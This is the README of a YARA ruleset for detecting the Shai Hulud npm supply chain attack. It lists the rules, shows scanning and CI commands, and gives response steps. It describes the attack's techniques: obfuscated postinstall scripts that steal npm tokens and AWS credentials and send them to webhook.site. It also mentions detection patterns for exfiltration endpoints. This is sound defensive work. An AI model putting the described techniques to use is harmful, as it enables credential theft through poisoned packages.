Shai Hulud Detection Rules

A comprehensive YARA ruleset for detecting compromise indicators from the Shai Hulud npm supply chain attack.

Overview

This project provides YARA detection rules to identify systems and codebases compromised by the Shai Hulud attack, a large-scale npm supply chain compromise that is ongoing (as of 2025-09-23) and has so far affected over 500 packages. The attack involves injecting malicious postinstall scripts that execute obfuscated code to steal npm tokens, AWS credentials, and other sensitive information.

Attack background

The Shai Hulud attack has so far compromised packages across multiple organisations including:

• CrowdStrike packages
• NativeScript community packages
• Various Angular and React ecosystem packages
• Development tools and utilities

The malicious packages contain:

• Obfuscated bundle.js files executed via postinstall hooks
• Code that exfiltrates npm tokens and credentials to webhook.site endpoints
• Self-replicating behaviour by cloning private repositories and inserting GitHub Actions workflows

Detection rules

The ruleset includes seven complementary detection rules:

1. Shai_Hulud_Compromised_Packages

• Severity: Critical
• Purpose: Detects known compromised packages by name and version
• Use case: Scanning package.json files, dependency lists, and build logs

2. Shai_Hulud_Bundle_Hash

• Severity: Critical
• Purpose: Matches known SHA-256 hashes of malicious bundle.js files
• Use case: File integrity checking and forensic analysis

3. Shai_Hulud_PostInstall_Hook

• Severity: Medium
• Purpose: Detects malicious postInstall script patterns
• Use case: Scanning package.json for suspicious install hooks

4. Shai_Hulud_Exfiltration_Endpoint

• Severity: Critical
• Purpose: Identifies known C2/exfiltration endpoints
• Use case: Network monitoring and log analysis

5. Shai_Hulud_Malicious_Package_Behavior

• Severity: Medium
• Purpose: Detects behavioural patterns of the malicious code
• Use case: Runtime analysis and general suspicious activity detection

6. Shai_Hulud_Bundle_File

• Severity: High
• Purpose: Detects suspicious bundle.js files in npm packages
• Use case: Scanning package.json and node_modules

7. Shai_Hulud_Suspicious_Behaviors

• Severity: Medium
• Purpose: Detects suspicious behaviours associated with Shai Hulud attack
• Use case: Runtime analysis and general suspicious activity detection

Usage

Prerequisites

Install YARA on your system:

# Ubuntu/Debian
sudo apt-get install yara

# Fedora
sudo dnf install yara

# macOS
brew install yara

# CentOS/RHEL
sudo yum install yara

Basic scanning

Scan a single file:

yara shai-hulud-rules.yar /path/to/suspicious/file

Scan a directory recursively:

yara -r shai-hulud-rules.yar /path/to/project/

Scan with verbose output:

yara -s shai-hulud-rules.yar /path/to/scan/

Common use Cases

Scan package.json files

find . -name "package.json" -exec yara shai-hulud-rules.yar {} \;

Scan node_modules for compromised packages

yara -r shai-hulud-rules.yar ./node_modules/

Scan JavaScript bundles

find . -name "*.js" -exec yara shai-hulud-rules.yar {} \;

Integration examples

CI/CD pipeline Integration

# .github/workflows/security-scan.yml
- name: Scan for Shai Hulud compromise
  run: |
    # Install Yara
    sudo apt-get update
    sudo apt-get install -y yara
    
    # Download rules and scan
    wget https://raw.githubusercontent.com/sorenjohanson/shai-hulud-indicators/refs/heads/main/shai-hulud-rules.yar
    yara -r shai-hulud-rules.yar .
    if [ $? -eq 0 ]; then
      echo "Shai Hulud compromise indicators detected!"
      exit 1
    fi

Pre-commit hook

#!/bin/bash
# .git/hooks/pre-commit
yara -r shai-hulud-rules.yar . > /dev/null
if [ $? -eq 0 ]; then
    echo "ERROR: Shai Hulud compromise indicators detected. Commit blocked."
    exit 1
fi

Response actions

If any rules trigger, immediately:

1. Isolate affected systems from network access
2. Audit all npm tokens and API keys - rotate immediately
3. Check AWS/cloud credentials for unauthorised usage
4. Review lockfiles for compromised package versions
5. Scan CI/CD systems and build artifacts
6. Update or downgrade all dependencies to clean versions
7. Monitor network logs for exfiltration attempts

Rule maintenance

This ruleset is designed for detection of known versions of Shai Hulud (latest known version is version 7). For ongoing supply chain security:

• Regularly update dependency scanning tools
• Implement software bill of materials (SBOM) tracking
• Monitor your package managers' audit reports
• Use dependency pinning and integrity checking

Prevent lifecycle script execution

Package managers may automatically execute lifecycle scripts like pre- or postinstall scripts. To prevent malicious script execution:

• npm: Use npm ci --ignore-scripts (combines frozen lockfile with script prevention)
• yarn v1: Use yarn install --frozen-lockfile --ignore-scripts
• yarn v2+: Use yarn install --immutable --ignore-scripts
• pnpm/bun: Ignore lifecycle scripts by default, but use --frozen-lockfile locally

Always use frozen lockfile options both in CI and locally to prevent dependency updates that could introduce compromised versions.

False positives

These rules are designed to minimise false positives by focusing on specific indicators of the Shai Hulud attack. However, legitimate packages may occasionally trigger alerts if they:

• Have similar naming patterns to compromised packages
• Use legitimate postinstall scripts with similar patterns
• Access npm configuration files for valid reasons

Always investigate and validate alerts in context.